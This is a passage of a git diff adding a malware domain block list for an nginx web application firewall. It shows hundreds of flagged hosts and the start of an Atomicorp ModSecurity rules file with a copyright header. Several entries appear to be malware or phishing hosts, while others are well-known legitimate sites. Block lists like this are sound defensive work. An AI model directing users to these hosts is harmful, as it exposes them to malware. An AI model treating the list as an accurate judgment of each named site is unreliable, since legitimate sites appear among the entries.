+www.dialogo21.it/
+www.diariodeeditais.com.br/
+www.die-alten.de/
+www.digitalprofitz.com/
+www.dip-kostroma.ru/
+www.discapacidadesecuador.org/
+www.discoverrussellville.org/
+www.diversityspeak.net/
+www.d-jamesinfo.com/
+www.dlkownz.com/
+www.doabc.org/
+www.doblepenalti.com/
+www.doggypost.com/
+www.dojobeauport.com/
+www.dokoiku.jp/
+www.domainserror.com/
+www.dominpe.com/
+www.doughmainz.com/
+www.downloadblog.altervista.org/
+www.drehuancavelica.gob.pe/
+www.drgbrtb.com/
+www.drivingcenter-baden.de/
+www.drogaembaca.org.br/
+www.drunkenbunyips.com/
+www.dsfashion.nl/
+www.dt-support.com/
+www.duaderajad.com/
+www.durere.3x.ro/
+www.dutchstockingpage.com/
+www.dv-media.co.uk/
+www.dzieckowice.pl/
+www.dzipas.lt/
+www.eastbayworks.org/
+www.eastpointchurch.org/
+www.easy-mart.co.kr/
+www.ebci.ucr.ac.cr/
+www.ebiexperts.com/
+www.ecf.cl/
+www.echtscheiding.com/
+www.eckosystem.eti.br/
+www.ecmnl.nl/
+www.ecolecommerciale.eu/
+www.econfusion.de/
+www.ecwebtek.com/
+wwweddingpics.land.ru/
+www.education.zp.ua/
+www.eduglobal.com.ar/
+www.eenpotnat.com/
+www.ehlcc.com/
+www.eicar.com/
+www.ejai.net/
+www.ekidscreation.com/
+www.ekolman.nl/
+www.eldesbande.com/
+www.elettraautomazioni.it/
+www.elitesense.com/
+www.eltima.com/
+www.emabe.com/
+www.emaging.fr/
+www.emailnotices.com/
+www.emroam.hpgvip.ig.com.br/
+www.endlessride.ch/
+www.energycanarias.com/
+www.enimien.com/
+www.enricco.cl/
+www.enricoromita.it/
+www.enterprisenetwork.hpgvip.ig.com.br/
+www.entgiftungspad.de/
+www.eq2arena.com/
+www.e-realestate-loans.com/
+www.eshqs.com/
+www.esoterium.de/
+www.estra7a.net/
+www.etclan.eu/
+www.etnkorea.com/
+www.etriple.com/
+www.eudipharm.net/
+www.euricolopes.net/
+www.eurosoniq.com/
+www.evilc0der.com/
+www.evilcoderzbr.xpg.com.br/
+www.evkircheoggersheim.de/
+www.eweek.com/
+www.ewhagu.or.kr/
+www.exhib-party.com/
+www.exploringcolumbia.com/
+www.explosivedjs.com/
+www.extremeaccess.info/
+www.extremelankkkkkkkkkk.hpg.com.br/
+www.extremus.info/
+www.ezphoto.biz/
+www.ezydemo.com/
+www.ezy-hosts.com/
+www.fachin-friedrich.de/
+www.falmeriafs.com/
+www.fansvictorvaldes.es/
+www.fastmodding.com/
+www.fc2-blog.com/
+www.feiradesantana.ba.gov.br/
+www.femanet.com.br/
+www.femme.com.br/
+www.festhall.com.br/
+www.fgo.at/
+www.fgwarez.com/
+www.fidanquetravel.com/
+www.fileden.com/
+www.filenanny.com/
+www.filesxfer.com/
+www.financejobdirectory.com/
+www.fiobera.unam.edu.ar/
+www.flagra-fotos.pop3.ru/
+www.flagstaffsaloon.be/
+www.flatmotor-vo.com/
+www.flexit.se/
+www.flogao-amanda.front.ru/
+www.fm24forum.de/
+www.fma-haiti.org/
+www.fnh.org.pl/
+www.fo-clan.de/
+www.fofocas.memebot.com/
+www.folgoreclan.com/
+www.fonsvandenhout.nl/
+www.fordx.org/
+www.forja-artistica.com/
+www.formula.altervista.org/
+www.forpinkpussy.com/
+www.fotoflog-fotos.mail15.com/
+www.fotos-corajosa.pochtamt.ru/
+www.fotosparaoblogdoorkut.mail15.com/
+www.fotos-rbd.land.ru/
+www.fox-forge.biz/
+www.frackenpohl-poulheim.de/
+www.fragtopia.com/
+www.fraiserandmain.com/
+www.frankstonhockeyclub.com/
+www.free-ddl.com/
+www.freedivulg.xpg.com.br/
+www.free-hoster.cc/
+www.freelance-media.ca/
+www.freemixtapes.us/
+www.freeweb.lt/
+www.freewebs.com/
+www.freewebtown.com/
+www.freshdining.com/
+www.fuchsbau32.de/
+www.fuckerboy.t35.com/
+www.funnykit.co.kr/
+www.fuori-corso.net/
+www.future-planning.net/
+www.gamanir.com/
+www.gamemmobbs.com/
+www.game-tank.at/
+www.gassner-design.de/
+www.gatecrashing.net/
+www.gcfps.org/
+www.gchp.org/
+www.gclass.it/
+www.gcsanj.org/
+www.geek-a-byte.com/
+www.geely.ch/
+www.gegio.it/
+www.geldstarter.de/
+www.geocities.com/
+www.germanyhost.de/
+www.gerryrowe.com/
+www.geschonneck.com/
+www.gewuerze.com/
+www.gfoclan.dk/
+www.gh1s.com/
+www.ghs-ostheim.de/
+www.gifr.fr/
+www.gilmores.ie/
+www.glined.tv/
+www.globo-brasil.smtp.ru/
+www.glur.de/
+www.goas.cz/
+www.goexacards.com/
+www.gogo52o.com/
+www.goldentaekwondo.com/
+www.goldletterdv.com/
+www.gomaka.com/
+www.gooteo.com/
+www.grandchasse.com/
+www.grandiralecole.fr/
+www.gratisweb.com/
+www.graveyard.altervista.org/
+www.greatekbr.com.br/
+www.greatlesbianmatches.com/
+www.greenact.or.kr/
+www.gressenberger.at/
+www.greytauctions.org/
+www.grimmelchen.com/
+www.groklaw.net/
+www.groovecalendar.com/
+www.grupomlucas.es/
+www.gruppomulti.ch/
+www.grupslactancia.info/
+www.gtaxweb.helloweb.eu/
+www.gulzarii.com/
+www.gumgangfarm.com/
+www.gurye.ms.kr/
+www.gvnr.xpg.com.br/
+www.h4x0rtools.kit.net/
+www.ha-boerse.net/
+www.hackaurelio.xpg.com.br/
+www.hackergroup.altervista.org/
+www.hacking-gps.com/
+www.hagenclauss.de/
+www.haircs.com/
+www.hairsite.com/
+www.hajj-umra.de/
+www.halfmanhalfhorse.com/
+www.hamann-tuning.de/
+www.hamburg-per-soehn-lich.de/
+www.ham-sur-heure-nalinnes.net/
+www.handball-club-sarrebourg.com/
+www.handicap.pevg.de/
+www.hapich.com/
+www.happyweighthappylife.nl/
+www.hashiriya.jp/
+www.hbakc.org/
+www.hcmediation.com/
+www.hddshare.com/
+www.healthinherbs.com/
+www.health-nutrition-business.com/
+www.heathpack9.org/
+www.heimkinopage.de/
+www.hi.lv/
+www.himem.com/
+www.hl0afe.com/
+www.hobbiz.com/
+www.holidayinn-geneve.com/
+www.hollywoodgolfclub.org/
+www.homemaranhaiii.pisem.su/
+www.hoopstar.ru/
+www.horoskop.info.pl/
+www.hospdexl.kit.net/
+www.hotelfazendaubatuba.com.br/
+www.hotel-ile-oleron.com/
+www.hotellasamericas.com.co/
+www.hotlinkfiles.com/
+www.hotnews.altervista.org/
+www.hotoilstocks.com/
+www.hotplus.nm.ru/
+www.houxou.com/
+www.hsbithui.com/
+www.hsbrazil.com/
+www.huerzeler-reisen.ch/
+www.humour25.net/
+www.iado.ie/
+www.iammypersonalbest.com/
+www.iautoking.com/
+www.iblon.it/
+www.ibtekarat.com/
+www.icebaer.at/
+www.icel.edu.mx/
+www.icpreview.com/
+www.idowebhosting.net/
+www.idss.org.do/
+www.ieplugin.com/
+www.iespana.es/
+www.igarsystem.com/
+www.ihmmank.net/
+www.ikazlevhalari.com/
+www.ilegais.xpg.com.br/
+www.ilial.com/
+www.iljd.org/
+www.image1hosting.com/
+www.imageforum.ru/
+www.imentor.org/
+www.imesf.it/
+www.immanuel-lutheran-sv.org/
+www.imperialcasino.com/
+www.imperialfutar.hu/
+www.importbarang.com/
+www.imprimis.com/
+www.indicce.com/
+www.indoirc.altervista.org/
+www.indycroft.com/
+www.informaprof.eu/
+www.infostec.net/
+www.infotranzit.ro/
+www.injectpanel.com/
+www.insertcoinhere.de/
+www.intermedik.de/
+www.internetnews.com/
+www.internetsafetysoftware.com/
+www.ip560.com/
+www.ipbill.com/
+www.i-promo.info/
+www.ircshow.net/
+www.iseeproject.org/
+www.iskanunu.com/
+www.isleconnect.com/
+www.ismailiroadtrip.com/
+www.ismys.com/
+www.isogo.co.za/
+www.isoland-gmbh.de/
+www.ispa-pecs-gis.hu/
+www.iswa-lb.org/
+www.italianiamonaco.com/
+www.italian-toplist.com/
+www.italianviper.altervista.org/
+www.itsn.nl/
+www.ivac.org/
+www.iwma.de/
+www.jacvanderveen.nl/
+www.jameshaydon.com/
+www.jappy.de/
+www.jarc.cl/
+www.jasungman.com/
+www.jbwc.or.kr/
+www.jef.at/
+www.jegonet.com/
+www.jested.net/
+www.jinantogo.com/
+www.jogos-online.land.ru/
+www.johan-potgieter.com/
+www.jonesmkt.com/
+www.joomla.teafree.pl/
+www.jopendoor.or.kr/
+www.jplineage.com/
+www.jrussellcommunities.com/
+www.jsproduction.net/
+www.jukensei.com/
+www.julmy.org/
+www.justsixdays.co.uk/
+www.j-vision.co.kr/
+www.jwayauctions.com/
+www.k5dionne.com/
+www.kachani.ie/
+www.kachina.ie/
+www.kajhellman.fi/
+www.kapf.org/
+www.karataudio.com/
+www.karazim.com/
+www.karine.co.kr/
+www.kasaworld.com/
+www.kazzo.helloweb.eu/
+www.kcsm.nl/
+www.keywordcandy.com/
+www.kilbowiethistle.com/
+www.kineufro.cl/
+www.kislorodmontag.ru/
+www.kitchen-counter-tops.net/
+www.kluna.info/
+www.km-jsw.gov.cn/
+www.koreacarcare.com/
+www.koreandentists.org/
+www.kremlinfilms.com/
+www.krex.tv/
+www.kullebo.dk/
+www.kulturland.org/
+www.lacomarcaatlantica.com.ar/
+www.laila.jp/
+www.lamershell.de/
+www.lammera.altervista.org/
+www.lammer.altervista.org/
+www.landkreis.halberstadt.de/
+www.lankawe.com/
+www.laspeores.com.ar/
+www.latinamericancongress.com/
+www.latinhola.com/
+www.laurenmerkin.com/
+www.lchs83.org/
+www.ldsblvd.com/
+www.leakdoctor.co.kr/
+www.lennoxpetroleum.com/
+www.lesovik.de/
+www.lewesmatters.co.uk/
+www.liautism.com/
+www.lieblingshomepage.de/
+www.lindor.altervista.org/
+www.lindori.de/
+www.lineagecojp.com/
+www.lingelink.net/
+www.linkfox.de/
+www.lipno-all-seasons.cz/
+www.liquidations.com/
+www.lirik.biz/
+www.lirykon.grupaphp.com/
+www.listmails.xpg.com.br/
+www.live-messenger.pisem.net/
+www.loanpole.com/
+www.loanscandyloans.com/
+www.localfood.or.kr/
+www.lonnie.com.au/
+www.lostoranes.com/
+www.love-12.smtp.ru/
+www.mahpushane.com/
+www.majestic12.co.uk/
+www.malteser-menden.de/
+www.mambembrincantes.com/
+www.manzoteam.it/
+www.maplestorfy.com/
+www.marcokrasenberg.nl/
+www.marguis.es/
+www.mariazell.at/
+www.marineliferescue.co.uk/
+www.marketing-ideas.org/
+www.marketingms.com/
+www.marsradio.in/
+www.massmodes.xpg.com.br/
+www.masterkkarate.com/
+www.mateus07.xpg.com.br/
+www.mateus.t5.com.br/
+www.math-center.gr/
+www.matilda-disco.com.ar/
+www.maxima-fm.com.mx/
+www.mbspro6uic.com/
+www.mealsvictoria.org.au/
+www.mecad.es/
+www.mediablackouts.com/
+www.mediumchannel.com/
+www.med.ucv.ve/
+www.megaupload.com/
+www.melonface.com/
+www.mensweekend.org.uk/
+www.menumagnet.com/
+www.merlions.se/
+www.mermaidsdontcook.com/
+www.miarakure.com/
+www.michigancityin.com/
+www.micmacrecords.com/
+www.microtrack.co.kr/
+www.miladyparis.com/
+www.milenijum-osiguranje.co.yu/
+www.mimundo.americaonline.com.mx/
+www.mindingmatter.com/
+www.mineforsale.com/
+www.ministryofentrepreneurship.com/
+www.miskolctapolca.hu/
+www.mlcrosoft.hpgvip.ig.com.br/
+www.mmcrc.co.za/
+www.mmf.selcuk.edu.tr/
+www.moas.com.br/
+www.mobilitalavorativa.it/
+www.mode-gone.net/
+www.moe.go.th/
+www.monitor.com.tw/
+www.monitoring-spy-software.com/
+www.moonbaesool.co.kr/
+www.moskaworned.xpg.com.br/
+www.motociclismo.pt/
+www.motorsport-arts.de/
+www.motoxclub.org.au/
+www.mrcomp.ru/
+www.mrfindalot.com/
+www.msnicon.com/
+www.mstpics.xpg.com.br/
+www.mta.cl/
+www.muingogai.com/
+www.myblogthemes.com/
+www.myfilestash.com/
+www.myrated.info/
+www.myrentaldesk.com/
+www.mysdcc.sdccd.edu/
+www.myserver.memebot.com/
+www.my-sl.com/
+www.n0n-clan.net/
+www.nabytokkorcek.sk/
+www.nagualhosting.com/
+www.naikid.com/
+www.najmahclub.com/
+www.nakedarena.com/
+www.nameserver11.net/
+www.nancybrilli.it/
+www.naoadianta2.memebot.com/
+www.napopwin.com.tw/
+www.nassc.com/
+www.naturalgreenlandscaping.com/
+www.n-ceo.org/
+www.nedaleko.ru/
+www.negociool.net/
+www.nerashti.com/
+www.netmasterservice.de/
+www.netmeup.ro/
+www.netprolive.com/
+www.netseer.com/
+www.nettogolf.se/
+www.networker.com.br/
+www.neverfallenclan.com/
+www.newarkfirefighterspipeband.com/
+www.newavalon.net/
+www.newcards155.rbcmail.ru/
+www.newcoloretiquetas.com.br/
+www.newstanis.it/
+www.nextlesson.com/
+www.nillo.com.br/
+www.nixelated.com/
+www.nordicracingteam.com/
+www.normnorton.com/
+www.northshoreclassifieds.com/
+www.no-such-thing.net/
+www.nouvellevie.com/
+www.novogerador.mail15.com/
+www.novogireevo.ru/
+www.nswshop.com/
+www.nuove-misure-sicurezza.com/
+www.nuovosportivissimo.it/
+www.nutrienforma.com/
+www.nycompsonline.com/
+www.obscorp.com/
+www.obzxpl.kit.net/
+www.ocarteiro-com.pop3.ru/
+www.oelhinhasdaplayboy.smtp.ru/
+www.officecoaching.nl/
+www.oirooke.com/
+www.oldcommonwealth.com/
+www.omegadm.co.uk/
+www.omirinda.kit.net/
+www.onlineprofitexpert.com/
+www.orbitaweb.com.br/
+www.orcamentor.pochta.ru/
+www.originalmoment.net/
+www-orkut-com-profile-aspxuid.mail333.su/
+www.osexporn.com/
+www.otavio_rox.kit.net/
+www.otherchance.com/
+www.oviedo93.com/
+www.ownar.xpg.com.br/
+www.packet.kit.net/
+www.pagetions.com/
+www.paginas-amor.smtp.ru/
+www.pag.it/
+www.paideiacentroservizi.it/
+www.pandoraformazione.it/
+www.pannama.net/
+www.panslog.net/
+www.paolodune.it/
+www.paparazzo-videos.pochta.ru/
+www.paradiseradio.org/
+www.paradstars.com/
+www.paravoce.mail15.com/
+www.parisvoyeur.com/
+www.partyanimals.nl/
+www.partybandflashback.nl/
+www.partypig.de/
+www.paulopimenta.com.br/
+www.pcf.com.tw/
+www.pcr.ac.id/
+www.pedrofloro.com/
+www.pemmican.mb.ca/
+www.perfecttransportation.com/
+www.perfilamos.com/
+www.personal-training-syb.de/
+www.pfarrgemeinde-schneeberg.de/
+www.pgup.hotbox.ru/
+www.phanom.ac.th/
+www.phreeow.net/
+www.piesse.org/
+www.pilcom.net/
+www.pinemore.com/
+www.pinkandblackmedia.com/
+www.pinkdoo.com/
+www.pinko.fi/
+www.pirateindustries.co.uk/
+www.playenline.com/
+www.playonlanei.com/
+www.p-l.nl/
+www.plocploc.theblog.com.br/
+www.pmcthai.com/
+www.pnp21.co.kr/
+www.pointpda.com/
+www.poker95.fr/
+www.pokerchipplanet.com/
+www.polimelaka.edu.my/
+www.pooya.info/
+www.popelin.cz/
+www.pordiosyporlapatria.org/
+www.portalangels-1.pop3.ru/
+www.portalangels.pop3.ru/
+www.portal.apescar.net/
+www.powertecmt.com.br/
+www.ppcabc.com/
+www.ppfbrazil.com.br/
+www.ppxp.ru/
+www.preferiti-windows.com/
+www.prepaidcard.net/
+www.pressurekru.co.uk/
+www.priproqua.altervista.org/
+www.prodesign-wedel.de/
+www.progressinternational.biz/
+www.provolonebig.altervista.org/
+www.proxycity.com/
+www.psctland.co.kr/
+www.psicosalute.it/
+www.psphacks.net/
+www.ptchina.org/
+www.pucorp.t5.com.br/
+www.pusanfood.com/
+www.q8x.info/
+www.qoogler.com/
+www.quantpro.dyndns.org/
+www.quebom.pop3.ru/
+www.quennect4.com/
+www.quickbar.co.kr/
+www.qyytw.com/
+www.r57.li/
+www.radio-terra.fromru.com/
+www.radioumbria.com/
+www.radioung.no/
+www.ragnarokonline1.com/
+www.ragnwiki.com/
+www.rambler.ru/
+www.randdesign.de/
+www.ranninp.com/
+www.rantandroll.com/
+www.rantapolku.net/
+www.rapidupload.com/
+www.rayyea.com.tw/
+www.rayzorowns.kit.net/
+www.rce-bay.com/
+www.realting.grodno.by/
+www.recette-dessert.com/
+www.redculture.com/
+www.redladys.net/
+www.rednetcat.com/
+www.redteam1.com/
+www.rehau-trocal.ru/
+www.rekryteringsgruppen.se/
+www.reptar.info/
+www.republik.be/
+www.reteiblea.it/
+www.reviews4poker.com/
+www.richmondcitywatch.com/
+www.ridgedogsofwar.com/
+www.rigacci.org/
+www.riothost.com/
+www.riri.pp.ru/
+www.rist.re.kr/
+www.ritterspektakel-leipzig.de/
+www.robosborn.com/
+www.rocketship69.com/
+www.rockhardnails.com/
+www.rodrigosigal.com/
+www.roisap.org/
+www.rojakedfeelings.blogspot.com/
+www.rokonline-jp.com/
+www.rootcon.com/
+www.rootways.ca/
+www.rosannawalls.com/
+www.rossolis.org/
+www.roxowner.110mb.com/
+www.rpgquotes.com/
+www.rulandocash.xpg.com.br/
+www.rusliepaja.lv/
+www.russellplanthaulage.co.uk/
+www.rv-bissingen.de/
+www.rwdshop.com/
+www.rxmodel.com/
+www.ryan1918.com/
+www.s2doss2.kit.net/
+www.sacredword.net/
+www.sadam10.hpgvip.com.br/
+www.sadamoreumesmo.hotbox.ru/
+www.saenterpriseworkshop.com/
+www.sajin88.com/
+www.sakerver.com/
+www.salebook.ru/
+www.santacruzlive.com/
+www.santonius.de/
+www.sarbrosolutions.com/
+www.sarion.info/
+www.sarkakasparkova.cz/
+www.saudades13-09-06.pop3.ru/
+www.saudades20-09-06.pop3.ru/
+www.savpol.sk/
+www.sawebsos.com/
+www.scanproxy.com/
+www.schausteller-scheit.de/
+www.scherzissimo.com/
+www.schmid-telecom.com/
+www.schuleniederwil.ch/
+www.schullie.com/
+www.scs07.com/
+www.scuolacastrezzato.it/
+www.sdmetal.org/
+www.sdpescadoresteruel.com/
+www.searchour.com/
+www.searchx.co.kr/
+www.sec-1labs.co.uk/
+www.sec6.biz/
+www.sedafi.com.ar/
+www.seesp.org.br/
+www.segundapuertomontt.cl/
+www.sel-de-re.tm.fr/
+www.s-e-l-f.de/
+www.selma.co.yu/
+www.semeterapia.com/
+www.semiahmoodle.net/
+www.send2thailand.com/
+www.sentechmarketing.com/
+www.sergio-garciaa.com/
+www.servicesbrazil.net/
+www.seucu.us/
+www.severin.ro/
+www.sexdates.nu/
+www.sexxxpassport.com/
+www.sgrunt.biz/
+www.shadow-wolves.de/
+www.shagigi.net/
+www.shaneogden.com/
+www.sharemation.com/
+www.sharenotesstore.com/
+www.sharingshores.com/
+www.shaunabanks.com/
+www.shearmanmitchell.com/
+www.sherv.net/
+www.shiesty.com/
+www.shikea.se/
+www.shn.be/
+www.shop40.websolution365.com/
+www.shopwiki.com/
+www.shouso.com/
+www.siberaskerler.org/
+www.sidefind.com/
+www.silak.eu/
+www.singlesonline.it/
+www.sipalki-aonikenk.com.ar/
+www.sisters.or.kr/
+www.sitereps.com/
+www.sitilinux.genova.it/
+www.skanray.dk/
+www.skd.it/
+www.skg-sprendlingen.de/
+www.sks18.net/
+www.skunkers.net/
+www.skyoffice.com.ar/
+www.skyrm.cn/
+www.slmsistemas.net/
+www.s-logistic.ru/
+www.slrusers.com/
+www.smagz.com/
+www.smarterscripts.com/
+www.smartlabphd.com/
+www.smdserv001.co.uk/
+www.smsc.no/
+www.smskb.com/
+www.smwcentral.net/
+www.snapdrive.net/
+www.snuz.org/
+www.sobolanu.com/
+www.softartstudio.com/
+www.sohbetsuper.org/
+www.soh-freedomforce.de/
+www.solidscripts.co.uk/
+www.somethingfunny.ws/
+www.sonarama.com/
+www.sonoraautoboutique.com.mx/
+www.soscontacto.com.mx/
+www.soulandsalsa.com/
+www.southpointmedia.com/
+www.southwestvtwin.com/
+www.sp4m.info/
+www.spedia.net/
+www.spices.res.in/
+www.sponsoradulto.com/
+www.sportcenterlido.it/
+www.spr0x.kit.net/
+www.ssdsa.org/
+www.stake5.be/
+www.stalkergameserver.com/
+www.stardvb.com/
+www.stashbox.org/
+www.stdr.xpg.com.br/
+www.stejax.pl/
+www.sternkinder2005.de/
+www.steuerkanzlei-kuhr.de/
+www.stickypen.com/
+www.stiri-mondene.com/
+www.storage-tasp.com/
+www.st-pieter.be/
+www.strider.we.bs/
+www.strider.xpg.com.br/
+www.strum-service.com.ua/
+www.studentessetroie.com/
+www.studio-wave.com/
+www.suikki.net/
+www.summercamps.ru/
+www.sunacoop.gob.ve/
+www.sunechae.com/
+www.sunofsadness.de/
+www.sunshinefarm.net/
+www.superestacion.fm/
+www.surginet.info/
+www.surproyecto.com.ar/
+www.suspended.by.ru/
+www.sustainaqua.org/
+www.suttas.com/
+www.sv-kgpi.ru/
+www.swe-frauen1.de/
+www.symphones.com/
+www.syshd.de/
+www.systel.ru/
+www.taillaert.be/
+www.talamasc.de/
+www.tamilmedia.dk/
+www.tasarim.in/
+www.tat.me.uk/
+www.tauchen.ge-nettetal.de/
+www.taxihosting.com/
+www.tbcode.com/
+www.tbforum.ru/
+www.tcww.info/
+www.tdepk.ru/
+www.teambuildamovie.com/
+www.teamcz.net/
+www.teamgodzilla.org/
+www.team-xecuter.com/
+www.techbomb.com/
+www.tecnicsuport.com/
+www.tecumsehscoutcabin.org/
+www.telefuglehund.org/
+www.teleperformance.com/
+www.tenis-prerov.cz/
+www.terra-cards.smtp.ru/
+www.terranova.dk/
+www.terrazap.com/
+www.terryspeake.co.uk/
+www.teste.dark-hosting.be/
+www.tgd.com.tr/
+www.theatreinthegrove.org/
+www.theauctiondepo.com/
+www.thebrn.kit.net/
+www.thefalife.com/
+www.thefancybritches.com/
+www.theheretics.net/
+www.thehogbitch.com/
+www.thelatinpower.com/
+www.themaciom.com/
+www.thenationalcouncil.com/
+www.thepeterboroughportal.co.uk/
+www.theplayboyinvest.com/
+www.thewellnessvillage.biz/
+www.thinklabsmedical.com/
+www.thomas.org.br/
+www.tiboron.de/
+www.ticino.altervista.org/
+www.timbrasilsamensagem.mail15.su/
+www.timdobrasil.rbcmail.ru/
+www.tim-foto-torpedos.krovatka.su/
+www.tirateuncentro.com/
+www.tkl.iis.u-tokyo.ac.jp/
+www.tkp.edu.hk/
+www.tnt-hq.net/
+www.todored.es/
+www.toms-carwash.nl/
+www.toobeez.com/
+www.topfood.be/
+www.top-pharma.info/
+www.torresvedras.biz/
+www.totalrc.net/
+www.totsmartcall.com/
+www.tovr.com/
+www.towerstimes.co.uk/
+www.toyshop.com.tw/
+www.treehall.com/
+www.treeoflifeinc.org/
+www.trepamontes4x4.com/
+www.tribunaleleitoral.pochta.ru/
+www.tribunal-superior-eleitoral.mail333.com/
+www.trinker-ulm.de/
+www.troppobelle.net/
+www.trosken.com/
+www.tse-regulamentos.pop3.ru/
+www.tsikot.biz/
+www.ts-sverige.com/
+www.tugzip.com/
+www.tukangbecak.com/
+www.tureksfuar.com.tr/
+www.turnitin.com/
+www.tus-dom-esch.de/
+www.tuttoscemo.com/
+www.twinauto.fr/
+www.twinkling-star.com/
+www.twplayhappy118.com/
+www.uamerica.edu.co/
+www.ugapak.org/
+www.uglyducklinglures.com/
+www.ugo.ru/
+www.uhrmacher-balster.de/
+www.uilscuolamilano.org/
+www.ukfinanceinfo.co.uk/
+www.ultimatebettingsystem.com/
+www.umpcdubai.com/
+www.underuaeh.com/
+www.undp.org.zw/
+www.unescoulsan.org/
+www.unevolved.org/
+www.unimontes.br/
+www.universodeluz.net/
+www.unsagbar.at/
+www.uol.krovatka.su/
+www.upload2world.com/
+www.uploadhut.com/
+www.u-p-r.org/
+www.uptours.com/
+www.urabaenlinea.com/
+www.urworte.de/
+www.usipime.com/
+www.usw-squad.net/
+www.utenti.lycos.it/
+www.uwgnh.org/
+www.vacc.org/
+www.valueform.biz/
+www.value-one.com/
+www.varliktanveriler.com/
+www.vdd.org.tr/
+www.vegastar.org/
+www.velis.hr/
+www.velvetclassic.net/
+www.venezia2.it/
+www.vennom.xpg.com.br/
+www.ventec.cl/
+www.verificcc.pochta.ru/
+www.vertigo.krovatka.su/
+www.vestainforma.it/
+www.vetrinista.it/
+www.vici.lt/
+www.victoriakart.ru/
+www.video007.pochta.ru/
+www.video-porno.cc/
+www.videosdiferentes.com/
+www.vikings-wanne.de/
+www.villasapart.co.uk/
+www.vip-phone.co.hu/
+www.virtualmsg.net/
+www.virtualshopindaia.com/
+www.vision-bg.com/
+www.visionnoir.com/
+www.visitecuador.travel/
+www.visitesantacatarina.com.br/
+www.vivo-com.pop3.ru/
+www.vlora.it/
+www.voa-server.de/
+www.vsm.gov.tr/
+www.vuls2008.kit.net/
+www.vwbr.com.br/
+www.wacacop.net/
+www.waddington.ws/
+www.wakejunkies.com/
+www.waldemarnowakowski.com/
+www.wantsfly.com/
+www.waterfrontoronto.ca/
+www.watertowncremationproducts.com/
+www.wattspot.us/
+www.waunakeesoccer.org/
+www.wcsc.tv/
+www.webflogsnet.krovatka.su/
+www.web-jogos.smtp.ru/
+www.webmaster-interactiv.de/
+www.websministry.com/
+www.webspace-invasion.com/
+www.webzenxd.kit.net/
+www.welkominfo.co.za/
+www.welshit.co.uk/
+www.wendelcruz.com/
+www.westminsterakron.com/
+www.wilsonsportsracing.com/
+www.windsornw.com/
+www.winiker.net/
+www.wolffilm.de/
+www.women.jo/
+www.woopss.de/
+www.worio.com/
+www.work-home-loans.net/
+www.workinghome2004.com/
+www.workzip.it/
+www.wormlistc99.pop3.ru/
+www.wsteam.net/
+www.wty.se/
+www.www-start-page.com/
+wwww.ysbweb.com/
+www.xarcash.com/
+www.x-code.co.cc/
+www.xdccshare.helloweb.eu/
+www.xdengue.xpg.com.br/
+www.xe.gr/
+www.xfactor.altervista.org/
+www.xinluoqu.com/
+www.xnnunbaa.mail333.su/
+www.xplproxysx.kit.net/
+www.xsenhalol.xpg.com.br/
+www.xucx.co.cc/
+www.xxxtoolbar.com/
+www.ycfa.org.tw/
+www.yescod.com/
+www.yes-gmbh.de/
+www.yildizdogan.org/
+www.yodng.org/
+www.yogyacardus.com/
+www.yourbesttype.com/
+www.yousendit.com/
+www.youximoney.cn/
+www.ysbweb.com/
+www.yuwon.es.kr/
+www.yyjjoopp.com/
+www.z3roadster.it/
+www.zahnwerk.com/
+www.zandweg-oostwaard.nl/
+www.zaralazgin.com/
+www.zdravenportal.net/
+www.zendurl.com/
+www.zetaxi.org/
+www.zezaku.extra.hu/
+www.zjkjw.gov.cn/
+www.zj-soft.cn/
+www.zlaja.de/
+www.zooz.com.br/
+www.zsdacice.cz/
+www.zuuniimedee.mn/
+www.zyssetd.ch/
+x22.a2000413.wrs.mcboo.com/
+x22.a616.wrs.mcboo.com/
+x22.a904.wrs.mcboo.com/
+xamuja.freehostia.com/
+x.apescar.net/
+xdedzx.100webspace.net/
+xdengue01.iespana.es/
+xdengue02.iespana.es/
+xdenguebds.iespana.es/
+xdenguexd.iespana.es/
+xentorteam.altervista.org/
+xhido.net/
+xhost.ro/
+.xicp.net/
+xl-rencontre.com/
+xoomer.alice.it/
+xoops.megafps.com/
+xoxoxoxox.h17.ru/
+xscanner.malwarealarm.com/
+xscanner.spyshredder-scanner.com/
+xsenhalol.xpg.com.br/
+xsenharox.xpg.com.br/
+xucx.co.cc/
+xx.522love.cn/
+xxshsryan1918.eclub.lv/
+xxuurrryan1918sdman.nm.ru/
+xxx.beeav.com/
+xxx.dnstt.com/
+xxxxxx.xxxxx.xxx.gif?/
+xxxxxx.xxxxx.xxx.gif/
+yahoo-servidor.pop3.ru/
+yaoip.fuckunion.com/
+yapi4denetim.com/
+yepland.com/
+yesamu.com/
+yidlive.com/
+yingfunghk.com/
+yoga0400.net/
+yoga0400.org/
+yourlocalhost.co.za/
+yourmaturewoman.com/
+yudz.110mb.com/
+yugifire43.t35.com/
+yugifire.t35.com/
+yugozone.files.wordpress.com/
+yurimusimsoumsis.chat.ru/
+z08.zupload.com/
+z10.zupload.com/
+z13.zupload.com/
+z15.zupload.com/
+z26.zupload.com/
+zal.sioru.net/
+zamanalwsl.net/
+zaperyan1918moon.chat.ru/
+zenteno.org/
+zezaku.extra.hu/
+zinero.no/
+zmetea.tripod.com/
+znjz.zjkjw.gov.cn/
+zodila.sunt.ws/
+zomsisueoeriyjskwkdejsrfeyare.land.ru/
+zul.com.pl/
+zy3653.com/
+zyoi.jp/
+zzpx.com/
diff --git a/nginx-waf/malware-blacklist-local.txt b/nginx-waf/malware-blacklist-local.txt
new file mode 100644
index 0000000..e69de29
diff --git a/nginx-waf/malware-blacklist-low.txt b/nginx-waf/malware-blacklist-low.txt
new file mode 100644
index 0000000..e69de29
diff --git a/nginx-waf/malware-blacklist.txt b/nginx-waf/malware-blacklist.txt
new file mode 100644
index 0000000..daf5bf4
--- /dev/null
+++ b/nginx-waf/malware-blacklist.txt
@@ -0,0 +1,930 @@
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+# Application Security Rules for modsec 2.x
+#
+# Created by Atomicorp (http://www.atomicorp.com)
+# Copyright 2013-2021 by Atomic Corpate Industries Inc. , all rights reserved.
+# Copyright 2005-2013 by Prometheus Global, all rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+#
+# Distribution of this work or derivative of this work in any form is 
+# prohibited unless prior written permission is obtained from the 
+# copyright holder. 
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS   
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE   
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE   
